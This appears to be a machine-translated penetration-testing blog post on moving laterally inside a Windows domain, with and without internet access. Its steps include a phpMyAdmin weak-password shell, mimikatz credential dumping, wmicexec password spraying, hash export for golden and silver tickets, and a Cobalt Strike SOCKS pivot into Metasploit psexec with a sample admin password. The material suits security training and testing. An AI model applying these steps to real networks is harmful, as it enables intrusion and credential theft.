Intranet Penetration-Intranet with and without Internet

Others 2021-03-07 10:23:33 views: null

Article Directory

Preface

In the process of penetration testing, after taking down a host in the domain, sometimes other hosts in the intranet have a network, sometimes there is no network. At this time, if there is a network, we can follow the regular penetration test. If there is no network, we The host should be used as a springboard, socks protocol or other methods should be used to communicate with hosts without internet

Hosts in the domain have a network

Insert picture description here

Attack process

Start the acquisition of domain control authority through the extranet WEB service of the webserver host in the domain environment.
If the webserver authority has been obtained:
0x01:

  • Through phpmyadmin weak password getshell

0x02:

  • msf generates msf listener getsystem upload'/root/x64' c:\test mimikatz
    privilege::debug sekurlsa::logonpasswords

0x03:

  • Batch processing wmicexec tests the existence of weak password 29 31 32 IP

0x04:

  • Get 29 31 32 permission rebound msf getsystem

0x05

  • Batch processing wmicexec test weak password 21 won the bid
  • execute -f cmd.exe -H -i 0x06
  • Export all hashes for gold and silver notes

Hosts in the domain have no network

Insert picture description here
Msf

  • I took the weserver and found that there are two network segments, 192.168.3.31 192.168.230.131,
    assuming 192.168.230.131 is the external network, and 192.168.3.31 is the internal network
  • It was also discovered that no other hosts on the intranet were connected to the Internet, only the webserver was connected.
  • At this point, you can use webserver as a springboard, open socks with cs, and use msf

Operating procedures

#cobalt strike

  • Start, monitor, generate, go online, escalate rights
  • cs starts socks4 to generate a springboard for listening ports, and setg Proxies
  • socks4:192.168.230.133:xxxxx copied to msf

msfconsole

  • Load proxy: setg Proxies socks4:192.168.230.133:xxxxx
  • Attack modules: ms17010 ms14068 smb psexec, etc.
  • use exploit/windows/smb/psexec

#Bind yourself to achieve a netless probe

  • set payload bind_tcp
  • set smbuser administrator
  • set smbpass admin!@#45
  • Upload mimikatz: upload'/root/x64' c:\test
  • mimikatz privilege::debug sekurlsa::logonpasswords

Guess you like

Origin blog.csdn.net/weixin_44110913/article/details/109149878
Recommended
TIOBE May list: Fortran “resurrected” into Top 10
GCC 14.1 released
Ranking
B. Little Girl and Game【1300 / 回文字符串 博弈论】
CIKERS Shane 20190613
"Javascript advanced programming" study notes - the constructor and prototype
beeline hiveserver2 start
springboot - Automatically backup mysql data every day
Data Storage Full Solution--Detailed Persistence Technology
Detailed Explanation of Spring Web MVC DispatcherServlet—Official Original
TCP / IP protocol layers structure and function
Command type literal pos: unknown; Fallback type literal pos: unknown] with root cause
Design of multifunctional curtain controller with indoor anti-theft alarm
Daily
More
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)

Code World

© 2018 codetd.com